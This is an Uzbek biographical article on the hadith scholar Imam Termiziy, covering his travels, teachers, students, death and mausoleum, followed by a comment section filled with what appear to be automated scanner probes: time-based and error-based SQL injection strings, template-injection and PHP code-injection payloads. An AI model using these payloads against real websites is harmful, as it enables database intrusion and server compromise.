Яратилиш санаси 31.10.2023

Imom Termiziy rohimullohning hayoti (2-qism)

Imom Termiziyning xorijiy mamlakatlarga qilgan safari uzoq yillarga cho‘zilib, avval eslatib o‘tganimizdek, bu safarlar chog‘ida ko‘pdan-ko‘p olimlar, muhaddislar bilan muloqotda bo‘ldi. Shu bilan birga, hadislarni to‘plab, kitoblar ta’lif qilishga ham kirishdi. Ayniqsa, mashhur muhaddis Buxoriy bilan Nishopurda birga faoliyat ko‘rsatib, ko‘plab ilmiy bahslarda ishtirok qiladi, bu haqida Imom Termiziy o‘zining “al-Ilal” kitobida yozadi. U xorijiy ellarga safarlaridan o‘z yurtiga 863-yillar atrofida qaytadi va mahalliy olimlar bilan ilmiy munozaralarda qatnashadi, ko‘plab shogirdlarga ustozlik qiladi. Imom Termiziyning ko‘pchilik asarlari, jumladan, mashhur asari “al-Jome’” ham o‘z vataniga qaytganidan keyin yozilgan.

Darhaqiqat, Imom Termiziy uzoq yillar Iroq, Isfahon, Xuroson, Makka va Madinada yashagan. Uzoq davom etgan safarlari chog‘ida qiroat ilmi, bayon, fiqh, tarix, ayniqsa, o‘zi yoshlikdan qiziqqan hadis ilmi bo‘yicha o‘sha davrning yirik olimlaridan ta’lim oladi. Mashhur muhaddislardan Imom Buxoriy, Imom Muslim, Imom Abu Dovud, Qutayba ibn Muso, Mahmud ibn G‘aylon va boshqalar uning ustozlari edi.

Bundan tashqari manbalarda allomaning ustozlari qatori quyidagicha sanab o’tilgan:

Ulug‘ ustozlari:

Ibrohim ibn Ismoil ibn Yahyo, Abu Is’hoq al-Kufiy 

Ibrohim ibn Sa’id al- Javhariy, Abu Is’hoq at-Tobariy 

Ibrohim ibn Abdulloh ibn Hotam al-Haroviy, Abu Is’hoq 

Ibrohim ibn Abdulloh ibn Munzir al-Bohiliy 

Ibrohim ibn Al-Mustamir al-Huzaliy, Abu Is’hoq al-Basriy, 

Ibrohim ibn Harun  al-Balxiy al-Obid,

Ibrohim ibn Ya’qub al-Javzaniy 

Ahmad ibn Ibrohim ibn Kasir ad-Davroqiy al-Bag‘dodiy 

Ahmad ibn Badil ibn Quraysh, Abu Ja’far al-Yamiy 

Ahmad ibn Abu Bakr ibn al-Horis, Abu Mus’ab az-Zuhriy al-Madaniy

Ahmad ibn Hasson ibn al-Maymun, undan Bag‘dodda eshitgan

Ahmad ibn al-Hasan ibn Junaydib at-Termiziy 

Ahmad ibn al-Hasan ibn Xirosh, Abu Ja’far al-Bag‘dodiy 

Ahmad ibn Xolid al-Xolal,  Abu Ja’far al-Bag‘dodiy 

Ahmad ibn Said ibn Ibrohim ar-Robatiy al-Marvaziy, Abu Abdulloh  al-Ashqor 

Ahmad ibn Said ad-Dorimiy 

Ahmad ibn Abdulloh ibn al-Hakam al-Hoshimiy “al-Kardiy” nomi bilan mashhur, Abul Husayn al-Basriy[1].

Termiziy Imom Buxoriy bilan uchrashganida (bu uchrashuv Nishopurda bo‘lgan va ikki alloma besh yil birgalikda yashashgan) hadisning matninigina emas, uning hikmati va falsafasini tushunib yetganini e’tirof etadi. O‘z vaqtida Imom Buxoriy shogirdini maqtab, kamtarinlik bilan: “Sen mendan bahra topganingdan ko‘ra men sendan ko‘proq bahra topdim”, degan. Bu Termiziyga berilgan juda katta baho edi.

Termiziy yo‘lda, safarda bo‘lganda ham, yoki bir joyda muqim turganda ham ustozlaridan, uchratgan roviylardan eshitgan hadislarni yozib olar, ularni tartibli ravishda alohida-alohida qayd qilib borardi. 868-yilda xorij safaridan o‘z yurtiga qaytgan Termiziy ilmiy-ijodiy ish, shogirdlar  tayyorlash bilan mashg‘ul bo‘ldi va yirik muhaddis, imom sifatida shuhrat qozondi. Taqvodorlik, islom dini va o‘z obro‘siga gard yuqtirmaslikka intilish, dunyo mol-matosi va boylikka beparvo qarash, oxiratning g‘amini yeyish Termiziyning hayoti tarzi edi. O‘z davrining yetuk muhaddis olimi sifatida tanilgan at-Termiziy ko‘pdan-ko‘p shogirdlarga ustozlik qilgan. Hadis ilmidagi uning shogirdlaridan Makhul ibn al-Fazl,  Muhammad ibn Mahmud Anbar, Hamod ibn Shokir, Abd ibn Muhammad Nasafiy,  Haysam ibn Kulayb Shoshiy, Ahmad ibn Yusuf Nasafiylarni ko‘rsatish mumkin.

Imom  Termiziy 279-hijriy (892-milodiy) yili rajab oyining 13-kunida vafot etgan. Vafot etgan vaqtida 70 yoshda bo‘lgan. Qabri hozirgi Surxondaryo viloyatining Sherobod tumanidadir.

Buyuk muhaddis Abu Iso Muhammad Imom Termiziy dafn qilingan maqbara 1-rasm ostida ilova qilib tikilgan. Ushbu maqbara XI–XII asr me’moriy yodgorliklaridan hisoblanadi. Sherobod tumanining sharqiy tomonidan 6 km masofada katta qabriston yonida joylashgan. Maqbaraning old tarafiga XX asr boshlarida ustunlari o‘ymakorlik bilan naqshlangan ayvon qurilgan va dastlabki ta’mirlash ishlari amalga oshirilgan[2].

Tarixchi Abdul Karim Sam’oniy (1113–1167) Imom  Termiziy Bug‘ qishlog‘ida vafot etganligi uchun Bug‘iy taxallusi bilan ham atalgani haqida yozadi.

1990-yili Abu Iso Imom Termiziy maqbarasi O‘zbekiston hukumati ajratgan mablag‘ hisobidan to‘liq ta’mirlandi. O‘sha yil kuzida esa O‘zbekiston Respublikasi Prezidenti tashabbusi bilan ulug‘ allomaning 1200-yillik yubileyi o‘tkazildi.

Mashhur muhaddis Abu Iso Termiziyning shaxsiy hayoti va barkamol ijodining har tomonlama o‘rganilishi tufayli buyuk bobokalonimizning hozirgi davrimiz uchun ham o‘rnak bo‘ladigan ko‘p ibratomuz fazilatlarining guvohi bo‘lamiz. Eng avvalo, Termiziyning yoshligidan ilm-fanga g‘oyatda chanqoqligi va zo‘r havas bilan qiziqishi, bu borada har qanday qiyinchiliklarga ham bardosh berib o‘z maqsadi, ya’ni o‘z bilimini oshirish yo‘lidagi jiddu-jahdi katta tahsinga sazovordir.

Yozma manbalarda keltirilishicha, hadisshunoslik ilmi sakkizinchi asrning ikkinchi yarmidan o‘n birinchi asr o‘rtalarigacha asosiy va zaruriy mashg‘ulotlardan biri darajasiga aylangan. Bu davrda Sharqning turli mamlakatlaridan bo‘lgan to‘rt yuzdan ortiq mualliflar ana shu ilm (hadisshunoslik) bilan shug‘ullanganlar.[3]

Ma’lumki, o‘z bilimini oshirish borasida Termiziy ko‘pgina xorijiy mamlakatlarni ziyorat qilgan. Elma-el kezib, cho‘lu biyobonlar oshib roviylardan eshitgan hadislarini yig‘ish bilan shug‘ullangan. Ularni tartibli ravishda yozib qayd qilish bilan birga ushbu hadislarni qanchalik darajada sahih, hasan yoki zaif, mavzu (soxta, o‘ylab chiqarilgan) ekanligini qayta-qayta tekshirgan, ilmiy ravishda chuqur tadqiq etgan. Allomaning shogirdlari orasida turli millat vakillari ham bo‘lgan.

Yoshi qirqdan oshgan va turli mamlakatlar olimlaridan ta’lim olgan Termiziy ham Imom Buxoriy mashhur bo‘lgan paytda yetuk olim darajasida tanilgan. Ikkala olim o‘rtasida 863—868 yillar oralarida Nishopurda ko‘pdan-ko‘p samarali ilmiy munozaralar, samimiy do‘stona uchrashuvlar bo‘lgan[4]. Termiziy o‘z asarlari uchun ko‘pgina foydali ma’lumotlarni Buxoriy bilan bo‘lgan uchrashuvlarida olganligini yozadi.[5]

Imom Termiziy asarlari: Manbalarda yozilishicha, hadislarni to‘plashda va o‘rganishda Termiziy har bir qulay fursatdan unumli foydalangan. U yo‘lda, safarda bo‘lganda ham yoki bir joyda muqim turganda ham o‘z ustozlaridan, uchratgan roviylaridan eshitgan hadislarni darhol yozib olib, ularni tartibli ravishda alohida-alohida qayd qilib borgan. O‘z davrining yetuk muhaddis olimi sifatida tanilgan Termiziy ko‘pdan-ko‘p shogirdlarga ustozlik qilgan.

Yana shuni alohida ta’kidlab o’tish kerakki, Abu Iso Muhammad at-Termiziyning hayotlarini o’rganish asnosida boshqa Termiziy nisbatli olimlar bilan adashtirish ehtimoli bor. Bulardan bir nechtasini sanash mumkin.

Ulardan biri albatta, al-Hakim at-Termiziydir.Uning to‘liq ismi Abu Abdulloh Muhammad ibn Ali ibn al-Hasan[6] ibn Bashir al-Hakim at-Termiziy bo‘lib, tarjimai holiga oid ma'lumotlar o‘rta asr arab mualliflaridan Tojuddin as-Subkiy, al-Xatib al-Bag‘dodiy, Ibn Hajar al-Asqaloniy, as-Sullamiy va boshqalar asarlarida, shuningdek, uning o‘zining qalamiga mansub “Bad'u sha'ni Abu Abdulloh” (Abu Abdulloh ishining boshlanishi) nomli avtobiografik risolasida keltirilgan.

Uning mazkur shakldagi to‘liq ismi alloma tomonidan yozilgan “Navodir ul-usul fi ma'rifat axbor ar-rasul” (Rasululloh xabarlari haqidagi nodir usullar), “Ilm ul-avliyo” (Valiylar yoki avliyolar ilmi), “Xatm ul-avliyo” (Avliyolarning oxirgisi) va “Nazoir ul-Qur'on” (Qur'on ibratlari) kabi asarlarning nomlari yoinki muqaddima qismlarida ham aynan shu tarzda keltirilgan. Al-Hakim at-Termiziy tavallud topgan sana xususida ham yozilgan manbalar va adabiyotlarda turli yillar keltirilgan. Odatda, o‘rta asrlarga oid yozma manbalarda aksar hollarda muallifning faqat vafot etgan yili ko‘rsatilib, tavallud etgan sanasi keltirilmaydi. Jumladan, taniqli olim Hoji Xalifa o‘zining “Kashf uz-zunun” nomli mashhur asarining bir necha o‘rinlarida al-Hakim at-Termiziy vafotini hijriy 255 (milodiy 869) yil deb ko‘rsatgan. Shuningdek, allomaning Termiz shahri yaqinida joylashgan maqbarasi ustida o‘rnatilgan qabrtoshdagi bitiklarda ham uning hayoti haqida ba'zi ma'lumotlar keltirilib, vafot etgan sanasi hijriy 255 (milodiy 869) deb yozilgan. Boshqa ba'zi manbalarda ham uning mazkur sanada vafot etganligi qayd etiladi. Al-Hakim at-Termiziyning uzoq - 116 yoinki 120-yil umr ko‘rganligini e'tiborga olsak, alloma sakkizinchi asrning o‘rtalarida (taxminan 750-760 yillar oralig‘ida) tavallud topganligi ayon bo‘ladi. Ayni vaqtda ba'zi zamonaviy tadqiqotchilar uning tavalludi va vafoti haqida batamom boshqa sanalarni ko‘rsatganlar. Jumladan, al-Hakim at-Termiziyning hayoti va uning ta'limotini chuqur o‘rgangan misrlik taniqli olim Abdulfattoh Abdulloh Baraka al-Hakim at-Termiziyni hijriy 205 (milodiy 820) yilda Termiz shahrida tavallud topib, uzoq umr ko‘rib, hijriy 320 (milodiy 932) yilda 112 yoshida vafot etganligi haqida yozadi. Mana shularni xulosa qilib aytish mumkinki, bu yo‘nalishda kelajakda olib boriladigan chuqur ilmiy tadqiqotlar alloma al-Hakim at-Termiziy tavalludi va vafoti sanalarini aniqlash imkonini beradi, deb o‘ylaymiz. Uning maqbarasi Termiz shahrining yaqinida Amudaryo bo‘yida joylashgan.

[1] Mirzo Kenjabek. Sunani Termiziy. – Toshkent: Sharq. 2012. – B. 16.

[2] http://qadamjo.uz/index.php

[3] Mirzo Kenjabek. Sunani Termiziy. – Toshkent: Sharq. 2012. – B. 24.

[4] Ibn Хаllikon. Vаfoyot аl-а’yon. – Qohirа: Dorul fikr. 2004. J-3. – B.407.

[5] Shаmsiddin Muhаmmаd ibn Аhmаd ibn Usmon аz-Zаhаbiy. Siyar а’lomi аn-nubаlo. J-12. – B.404.

[6] Ba'zi muarrixlar, masalan, ash-Shaaroniy o‘zining «at-Tabaqot al-kubro» asarining 78-sahifasida al-Husayn deb keltirgan.

Muhiddinov Muzaffar

“Hidoya” o'rta maxsus islom
bilim yurti o'qituvchisi

Изоҳ қолдириш

Изоҳлар

09.11.2023 06:31
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',3)='n
09.11.2023 06:31
123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z
09.11.2023 06:30
123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('o',3)
09.11.2023 06:30
123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('q',0)
09.11.2023 06:30
123456'and(select+1)>0waitfor/**/delay'0:0:3
09.11.2023 06:30
123456'and(select+1)>0waitfor/**/delay'0:0:0
09.11.2023 06:30
123456/**/and(select+1)>0waitfor/**/delay'0:0:3'/**/
09.11.2023 06:30
123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
09.11.2023 06:29
123456'/**/and(select'1'from/**/pg_sleep(3))::text>'0
09.11.2023 06:29
123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
09.11.2023 06:29
123456'"\(
09.11.2023 06:29
123456/**/and(select+1/**/from/**/pg_sleep(3))>0/**/
09.11.2023 06:29
123456鎈'"\(
09.11.2023 06:29
123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
09.11.2023 06:29
123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1707541887')))>'0
09.11.2023 06:29
123456"and(select*from(select+sleep(3))a/**/union/**/select+1)="
09.11.2023 06:29
convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1089572760')))
09.11.2023 06:29
123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
09.11.2023 06:29
123456/**/and/**/cast(md5('1637138045')as/**/int)>0
09.11.2023 06:28
123456'and(select*from(select+sleep(3))a/**/union/**/select+1)='
09.11.2023 06:28
123456'and(select'1'from/**/cast(md5(1445128302)as/**/int))>'0
09.11.2023 06:28
123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
09.11.2023 06:28
extractvalue(1,concat(char(126),md5(1919545781)))
09.11.2023 06:28
(select*from(select+sleep(3)union/**/select+1)a)
09.11.2023 06:28
(select*from(select+sleep(0)union/**/select+1)a)
09.11.2023 06:28
123456'and/**/extractvalue(1,concat(char(126),md5(1753957733)))and'
09.11.2023 06:28
123456
09.11.2023 06:28
123456
09.11.2023 06:28
123456
09.11.2023 06:28
123456
09.11.2023 06:28
<%- 912261807+890839283 %>
09.11.2023 06:28
123456
09.11.2023 06:28
#set($c=941311191+921132077)${c}$c
09.11.2023 06:28
123456
09.11.2023 06:27
123456
09.11.2023 06:27
123456"and"s"="u
09.11.2023 06:27
${(828138446+877087970)?c}
09.11.2023 06:27
123456
09.11.2023 06:27
123456"and"g"="g
09.11.2023 06:27
${816005240+852380392}
09.11.2023 06:27
123456
09.11.2023 06:27
123456'and'z'='m
09.11.2023 06:27
/*1*/{{983955096+950624921}}
09.11.2023 06:27
123456
09.11.2023 06:27
123456'and'l'='l
09.11.2023 06:27
123456
09.11.2023 06:27
123456/**/and+1=5
09.11.2023 06:27
123456
09.11.2023 06:27
123456/**/and+3=3
09.11.2023 06:26
123456
09.11.2023 06:26
123456
09.11.2023 06:26
123456
09.11.2023 06:26
123456
09.11.2023 06:26
${839960556+841858276}
09.11.2023 06:26
123456
09.11.2023 06:26
'-var_dump(md5(986305561))-'
09.11.2023 06:26
123456
09.11.2023 06:26
${@var_dump(md5(177032246))};
09.11.2023 06:26
123456
09.11.2023 06:26
123456